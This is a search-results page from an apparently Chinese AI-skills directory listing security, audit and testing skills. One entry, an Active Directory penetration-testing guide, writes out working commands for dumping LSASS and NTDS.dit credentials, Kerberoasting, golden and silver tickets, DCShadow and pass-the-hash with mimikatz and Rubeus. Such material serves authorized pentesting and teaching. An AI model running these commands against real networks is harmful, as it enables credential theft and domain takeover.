灵感菇

A natural ecosystem of AI skills: one sentence from you spreads into limitless connections.

Search results

All capabilities

Found 97 related results / Testing & QA

Security & Governance / Audit & Assessment

ln-634-test-coverage-auditor

ln-634-test-coverage-auditor

338

Identifies missing tests for unique critical local logic: money, auth, permissions, data integrity, algorithms, and domain rules. Use when auditing critical…

Stars 465
audit, auth, rag, 634

Security & Governance / Audit & Assessment

sql-injection-testing

sql-injection-testing

329

Execute comprehensive SQL injection vulnerability assessments on web applications to identify database security flaws, demonstrate exploitation techniques, and…

Stars 37,711
ui, testing, security, auth

Security & Governance / Audit & Assessment

Active Directory Attacks

active-directory-attacks

300

Active Directory penetration testing technique guide

## Information gathering

### Basic domain information

- `nltest /domain_trusts` - List domain trust relationships
- `net view /domain` - Enumerate domains
- `nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>` - Locate domain controllers

### BloodHound asset discovery

```powershell
# SharpHound data collection
Invoke-BloodHound -CollectionMethod All -Domain target.com -ZipFileName loot.zip
```

### LDAP queries

```powershell
# Find domain admin accounts
([adsisearcher]"(&(objectCategory=person)(objectClass=user)(adminCount=1))").FindAll()
# Find service accounts with unconstrained delegation
Get-ADObject -LDAPFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)(samAccountType=805306368))"
```

## Credential access

### LSASS memory extraction

```powershell
# procdump + mimikatz offline parsing
procdump.exe -accepteula -ma lsass.exe lsass.dmp
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
```

### SAM/NTDS.dit extraction

```powershell
# Volume Shadow Copy method
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\loot\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\loot\
# ntdsutil official tool
ntdsutil "ac i ntds" "ifm" "create full c:\loot" q q
```

### Kerberoasting

```powershell
# Request an SPN service ticket
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.target.com:1433"
# Rubeus automation
Rubeus.exe kerberoast /outfile:hashes.txt
```

## Kerberos attacks

### AS-REP Roasting

```powershell
# Find accounts with "Do not require Kerberos preauthentication" set
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth
# Rubeus attack
Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
```

### Golden Ticket

```powershell
# Requires the NTLM hash of the krbtgt account
mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt
mimikatz # kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /krbtgt:hash /ptt
```

### Silver Ticket

```powershell
# Targets a specific service; requires the service account's NTLM hash
mimikatz # kerberos::golden /user:fakeuser /domain:target.com /sid:S-1-5-21-... /target:sql01.target.com /service:MSSQLSvc /rc4:servicehash /ptt
```

### DCShadow

```powershell
# Requires domain admin privileges; registers a rogue DC
mimikatz # lsadump::dcshadow /object:targetuser /attribute:Description /value:"backdoor"
```

## Lateral movement

### Pass-the-Hash

```powershell
# mimikatz
sekurlsa::pth /user:admin /domain:target.com /ntlm:hash /run:powershell.exe
# Invoke-WMIExec
Invoke-WMIExec -Target dc01.target.com -Username admin -Hash hash -Command "powershell -enc ..."
```

### Over-Pass-the-Hash

```powershell
# Obtain a TGT, then use normal Kerberos authentication
Rubeus.exe asktgt /user:admin /rc4:hash /ptt
```

### Pass-the-Ticket

```powershell
# Export tickets, then inject them
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt [0;123456]-0-0-40810000-admin@krbtgt-target.com.kirbi
```

### Constrained delegation abuse

```powershell
# Configure S4U2Self + S4U2Proxy
Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:admin /msdsspn:cifs/target.target.com /ptt
```

### Resource-based constrained delegation (RBCD

Stars 0
ui, ux, testing, security

Security & Governance / Audit & Assessment

Alibaba Cloud Security - KMS Test

alicloud-security-kms-test

295

Minimal smoke test for the KMS skill. Verifies authentication and the read-only key listing path.

Stars 0
ui, security, auth, api

Security & Governance / Audit & Assessment

alicloud-ai-misc-crawl-and-skill-test

alicloud-ai-misc-crawl-and-skill-test

294

Minimal validation of the readiness of the crawl and skill workflows.

Stars 0
ui, auth, workflow, alicloud

Security & Governance / Audit & Assessment

Alibaba Cloud Observability - SLS Log Query Test

alicloud-observability-sls-log-query-test

294

Minimal smoke test for the SLS log query skill. Verifies SDK authentication and a single bounded query.

Stars 0
ui, auth, alicloud, observability

Security & Governance / Audit & Assessment

alicloud-network-dns-cli-test

alicloud-network-dns-cli-test

292

Minimal smoke test for the Alibaba Cloud DNS CLI skill. Verifies aliyun-cli authentication and the describe-subdomain flow.

Stars 0
ui, auth, alicloud, network

Security & Governance / Audit & Assessment

security-scanning-security-dependencies

security-scanning-security-dependencies

292

You are a security expert specializing in dependency vulnerability analysis, SBOM generation, and supply chain security. Scan project dependencies across…

Stars 37,704
testing, security, audit, database

Security & Governance / Audit & Assessment

agent-skills-creator

agent-skills-creator

289

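Guides the creation of best-practice agent skills that follow the open format specification. Covers frontmatter metadata, directory structure, progressive disclosure, …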

Stars 0
design, ui, testing, audit

Security & Governance / Audit & Assessment

connecting-to-data-source

connecting-to-data-source

261

Stars 0
ui, testing, security, audit

Security & Governance / Audit & Assessment

nielsen-heuristics-audit

nielsen-heuristics-audit

257

Evaluate UX/UI using Jakob Nielsen's 10 usability heuristics. Comprehensive audit of visibility, control, consistency, error prevention, recognition,…

Stars 28
design, ui, ux, testing

Security & Governance / Audit & Assessment

playwright-in-sandbox

playwright-in-sandbox

242

Primary Playwright governance skill for sandbox browser verification and deterministic end-to-end authoring or rewrite work.

Stars 1
backend, ui, playwright, auth

Security & Governance / Audit & Assessment

deploying-contracts-on-base

deploying-contracts-on-base

237

Deploys smart contracts to Base using Foundry. Covers forge create commands, contract verification, testnet faucet setup via CDP, and BaseScan API key…

Stars 70
ui, deployment, security, audit

Security & Governance / Audit & Assessment

ssh-penetration-testing

ssh-penetration-testing

233

Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and…

Stars 37,711
ui, testing, security, audit

Security & Governance / Audit & Assessment

axiom-ios-accessibility

axiom-ios-accessibility

205

Use when fixing or auditing ANY accessibility issue - VoiceOver, Dynamic Type, color contrast, touch targets, WCAG compliance, App Store accessibility review.

Stars 902
audit, axiom, ios, accessibility

Security & Governance / Audit & Assessment

owasp-llm-top10

owasp-llm-top10

196

Security audit for LLM and GenAI applications using OWASP Top 10 for LLM Apps 2025. Assess prompt injection, data leakage, supply chain, and 7 more critical…

Stars 28
security, audit, auth, llm

Security & Governance / Audit & Assessment

pentest-expert

pentest-expert

189

Penetration testing methodology expert. OWASP, PTES, reconnaissance, scanning, exploitation, reporting. Use for security assessments.

Stars 16
testing, security, pentest, expert

Security & Governance / Audit & Assessment

supabase-audit-auth-config

supabase-audit-auth-config

189

Analyze Supabase authentication configuration for security weaknesses and misconfigurations.

Stars 40
ui, security, audit, auth

Security & Governance / Audit & Assessment

doc-coauthoring

doc-coauthoring

184

Guide users through a structured workflow for co-authoring documentation. Use when user wants to write documentation, proposals, technical specs, decision…

Stars 276
design, ui, testing, auth

Security & Governance / Audit & Assessment

metasploit-framework

metasploit-framework

179

⚠️ AUTHORIZED USE ONLY > This skill is for educational purposes or authorized security assessments only. > You must have explicit, written permission from the…

Stars 37,690
ui, ux, testing, security